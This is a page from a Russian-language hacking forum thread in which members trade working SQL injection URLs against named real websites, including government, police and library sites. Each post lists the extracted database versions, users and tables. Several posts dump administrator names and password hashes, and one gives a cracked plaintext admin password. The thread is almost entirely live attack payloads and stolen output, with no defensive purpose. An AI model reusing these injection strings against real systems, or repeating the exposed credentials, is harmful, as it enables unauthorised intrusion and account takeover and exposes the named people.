SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://www.corporatereputations.ie/case_study.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),database(), user()),4,5,6,7,8,9,10--

    5.0.45-community-log:nboyle_crdata:[email protected]

    PR: 2
    ------------------------------------------------------------------------
    чей то там офиц сайт))

    http://www.veliko-tarnovo.net/index.php?page=notice&type=t&id=-1'+union+select+1,concat_ws(0x3a,version(),database() ,u ser()),3,4,5/*

    4.1.20:veliko-tarnovo_net_-_main3:vtarnovo@localhost

    ТИЦ: 10
    PR: 5
     
    _________________________
    #9041 HAXTA4OK, 1 May 2009
    Last edited: 1 May 2009
  2. erihtoney

    erihtoney Member

    Joined:
    3 Mar 2009
    Messages:
    91
    Likes Received:
    73
    Reputations:
    20
    Официальный сайт полиции Индонезии
    PR:3

    All tables:
    Code:
    http://www.simalungunkab.go.id/en/?id=-1+union+select+1,2,3,4,
    group_concat(table_name),6+from+information_schema.tables--
    version:5.0.67-community
    user:simalung_root@localhost
    database:simalung_simalungun
     
  3. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    http://www.advancedstaffing.jobs/details.php?id=31+union+select+1,version(),database(),4,5,6,7,8,9/*

    4.0.27-max-log
    advstaff
     
  4. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    www.monne.ru
    Code:
    http://www.monne.ru/?show=catalog&id=-34+union+select+1,2,3,4--
    version()4.1.22-standard-log
    database()monneru_main
    user()monneru_adm@localhost
    compile_os()pc-linux-gnu


    www.armouredvehicles.net
    Code:
    http://www.armouredvehicles.net/vehicle.php?id=-107+union+select+1,2,3,4,concat_ws(0x203a20,version(%20),database(),user(),@@version_compile_os),6,7,8--
    version()5.0.67-log
    database()zbozi_mortarinvestments_eu
    user()[email protected]
    compile_os()unknown-linux-gnu
     
    1 person likes this.
  5. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://www.bourgas-real-estate.com/show_news.php?id=-1+union+select+1,concat_ws(0x3a,version(),databa se(),us er()),3,4,5,6--

    5.0.67-log:bourgas_real:bourgas_real@localhost

    есть таблица: rea_users =
    http://www.bourgas-real-estate.com/show_news.php?id=-1+u nion+select+1,table_name,3,4,5,6+from+information_schem a.tables+limit+46,1--

    PR: 3
    ------------------------------------------------------------------------

    http://www.gdi.gov.ge/index.php?lang=eng&id=1+union+select+1,concat_ws(0x3a,versi on(),databa se(),use r()),3,4,5,6--

    5.0.77:gdigov_garemo:gdigov@localhost

    PR: 2

    таблицы:
    contact
    description
    images
    news
    users
     
    _________________________
    #9045 HAXTA4OK, 1 May 2009
    Last edited: 1 May 2009
  6. InFlame

    InFlame Banned

    Joined:
    27 Oct 2008
    Messages:
    207
    Likes Received:
    32
    Reputations:
    0
    Blind SQL-inj
    Target: www.strut.bm

    Evil links:
    http://www.strut.bm/products.php?page=1&categoryID=16+and+ascii(lower(substring(version(),1,1)))=52 result: false
    http://www.strut.bm/products.php?page=1&categoryID=16+and+ascii(lower(substring(version(),1,1)))=53 result: true
    и т.д.

    Info:
    version: 5.1.30
    user: strutbm@localhost
    database: strutbm_shoestore
     
  7. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://www.gepra.ge/eng/showserv.php?id=1'+union+select+1,2,concat_ws(0x3a,version(),databa se(),us er()),4,5,6/*


    4.1.13:gepra_ge:gepra.ge@localhost

    ТИЦ: 10
    PR: 4
    ------------------------------------------------------------------------

    http://www.backofthehouse.eu/news.php?lg=ge&id=1+union+select+1,2,3,concat_ws(0x3a,version(),datab ase(),u ser()),5,6,7,8,9,10,11,12,13--

    5.0.45-log:backofthehousech:both@localhost
     
    _________________________
    #9047 HAXTA4OK, 1 May 2009
    Last edited: 1 May 2009
  8. _SEREGA_

    _SEREGA_ Banned

    Joined:
    28 Mar 2008
    Messages:
    132
    Likes Received:
    44
    Reputations:
    7
    скуль:
    5.0.67

    Code:
    http://www.helilooja.ee/emp_eng.php?id=-25+union+select+1,2,3,4,5,6,7,8,9,10,11--

    инфа:

    Code:
    http://www.helilooja.ee/emp_eng.php?id=-25+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),0x3a,database()),8,9,10,11--
     
  9. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://www.whpr.ie/menu.php?id=1&sid=-5+union+select+1,2,3,concat_ws(0x3 a,version( ),data base(),user()),5,6,7,8,9,10,11,12,13--

    4.0.15:whpr:whpr@localhost

    PR: 4
     
    _________________________
  10. _SEREGA_

    _SEREGA_ Banned

    Joined:
    28 Mar 2008
    Messages:
    132
    Likes Received:
    44
    Reputations:
    7
    скуль:

    Code:
    http://www.tsl.net.ru/index.php?id=-25+union+select+1,2,3,4,5,6,7,8,9,10,11--
    4.0.26

    инфа:

    Code:
    http://www.tsl.net.ru/index.php?id=-25+union+select+1,2,concat_ws(0x3a,user()),4,5,6,7,8,9,10,11--
    tslnetru@localhost
     
  11. farex

    farex Banned

    Joined:
    11 Mar 2009
    Messages:
    213
    Likes Received:
    85
    Reputations:
    6
    <<Туры.ру>>
    Code:
    http://www.tury.ru/image.php?rgallery_id=9999999999/**/union/**/select/**/1,2,concat_ws(0x3a,version(),database(),user(),@version_compile_os),4,5,6,7,8,9,0,1--
    5.0.70:[email protected]
     
  12. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    http://bangla8.com/corporate/corp-jobs-details.php?id=-192+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15--

    5.0.67-community
     
  13. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    5.0.32-Debian_7etch8-log:mesagerul_ro:mesagerulălocalhost
     
  14. erihtoney

    erihtoney Member

    Joined:
    3 Mar 2009
    Messages:
    91
    Likes Received:
    73
    Reputations:
    20
    _____________________

    LSCA
    PR:5
    Code:
    http://www.noxubee.lib.ms.us/bookclub/forum/forums.asp?iFor=12+union+select+1,
    2,3,u_password,5,u_id
    ,7,8,9,10,11,12+from+users
    _____________________
     
  15. Rav1n

    Rav1n Elder - Старейшина

    Joined:
    5 Nov 2008
    Messages:
    7
    Likes Received:
    21
    Reputations:
    11
    Code:
    http://www.webypoku.ru/view.php?sec=1&id=-14+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8--
    version: 5.0.67-percona-highperf-b7-log
    database: tulluk
    user: tulluk@localhost

    Code:
    http://www.webypoku.ru/view.php?sec=1&id=-14+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables--
    tables:
    Code:
    CHARACTER_SETS,CLIENT_STATISTICS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,INNODB_BUFFER_POOL_CONTENT,INDEX_STATISTICS,KEY_COLUMN_USAGE,PROCESSLIST,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TABLE_STATISTICS,TRIGGERS,USER_PRIVILEGES,USER_STATISTICS,VIEWS,INNODB_IO_PATTERN,article,comment,file,lesson,php4func
     
  16. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    http://www.saratogasoftwaresolutions.com/jobs/details.php?ID=-35+union+select+1,fullname,3,4,5,6,7,8,9,pwd,11,12,13,14+from+admin/*

    Leanne Madsen
    409f66041978caf7e6c02d17042f251d

    http://www.expertalent.com/jobs/details.php?ID=-99+union+select+1,fullname,pwd,4,5,6,7,8,9,10,11,12,13+from+admin/*

    Sam Harrison
    601e399c8dfc646df0e1d39ff1e51645


    ПР5
    http://www.housingnet.co.uk/jobs-details.php?jobid=297+union+select+version()--

    4.0.27-standard
     
    #9056 DezMond™, 2 May 2009
    Last edited: 2 May 2009
  17. BlackPanther

    BlackPanther New Member

    Joined:
    19 Apr 2009
    Messages:
    12
    Likes Received:
    4
    Reputations:
    0
    Site:
    Code:
    http://www.canadiansoftwood.com/
    SQL -
    Уязвимый параметр:
    Code:
    http://www.canadiansoftwood.com/index.php?mode=news&id=1
    Code:
    http://www.canadiansoftwood.com/index.php?mode=news&id=-1+union+select+1,CONCAT_WS(CHAR(32,58,32),user(),database(),%20version()),3,4,5,6--
    csidb1@localhost : mysql : 4.1.14
    Таблица:
    Code:
    http://www.canadiansoftwood.com/index.php?mode=news&id=-1+union+select+1,CONCAT_WS(CHAR(32,58,32),user(),database(),%20version()),3,4,5,6+from+user--
     
  18. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://news.rapmusic.tu2.ru/new.php?st=-1+union+select+1,concat_ws(0x3a,user(),database(),version())
    rapmusic3@localhost:rapmusic3:5.0.51a-log
     
    2 people like this.
  19. Rav1n

    Rav1n Elder - Старейшина

    Joined:
    5 Nov 2008
    Messages:
    7
    Likes Received:
    21
    Reputations:
    11
    Code:
    http://avtolampy.com.ua/view.php?id=-288+union+select+concat_ws(0x3a,version(),database(),user())--
    version: 5.0.45-log
    database: avtolampy1_db
    user: avtolampy1_db@s8

    tables:
    Code:
    CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,catalog,content,jos_adsmanager_ads,jos_adsmanager_categories,jos_adsmanager_columns,jos_adsmanager_config,jos_adsmanager_field_values,jos_adsmanager_fields,jos_adsmanager_positions,jos_adsmanager_profile,jos_banner,jos_bannerclient,jos_bannerfinish,jos_categories,jos_components,jos_contact_details,jos_content,jos_content_frontpage,jos_content_rating,jos_core_acl_aro,jos_core_acl_aro_groups,jos_core_acl_aro_sections,jos_core_acl_groups_aro_map,jos_core_log_items,jos_core_log_searches,jos_groups,jos_mambots,jos_menu,jos_messages,jos_messages_cfg,jos_modules,jos_modules_menu,jos_newsfeeds,jos_poll_data,jos_poll_date,jos_poll_menu,jos_polls,jos_sections,jos_session,jos_stats_agents,jos_template_positions,jos_templates_menu,jos_users,jos_usertypes,jos_weblinks
    Code:
    http://avtolampy.com.ua/view.php?id=-288+union+select+concat_ws(0x3a,id,name,username,email,password)+from+jos_users--
    62:Administrator:admin:[email protected]:2cdcbe2c0a133787ceeb5516360c1cde

    admin:xlsqbq
     
  20. BlackPanther

    BlackPanther New Member

    Joined:
    19 Apr 2009
    Messages:
    12
    Likes Received:
    4
    Reputations:
    0
    Site:
    Code:
    http://www.belvneshstrakh.by/
    SQL -
    Уязвимая перемен
    Code:
    http://www.belvneshstrakh.by/ru//?page=news&id=1+union+select+1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),%20version()),4,5,6,7--
    bvs@localhost : belvneshstrakh_by : 5.0.45-log
    Code:
    http://www.belvneshstrakh.by/ru//?page=news&id=-1+union+select+1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),%20version()),4,group_concat(table_name),6,7+from+information_schema.tables--
    Table:
    Code:
    :::CHARACTER_SETS,:::COLLATIONS,:::COLLATION_CHARACTER_SET_APPLICABILITY,:::COLUMNS,:::COLUMN_PRIVILEGES,:::KEY_COLUMN_USAGE,:::PROFILING,:::ROUTINES,:::SCHEMATA,:::SCHEMA_PRIVILEGES,:::STATISTICS,:::TABLES,:::TABLE_CONSTRAINTS,:::TABLE_PRIVILEGES,:::TRIGGERS,:::USER_PRIVILEGES,:::VIEWS,:::image,:::news,:::page,:::sections
     
    1 person likes this.
Thread Status:
Not open for further replies.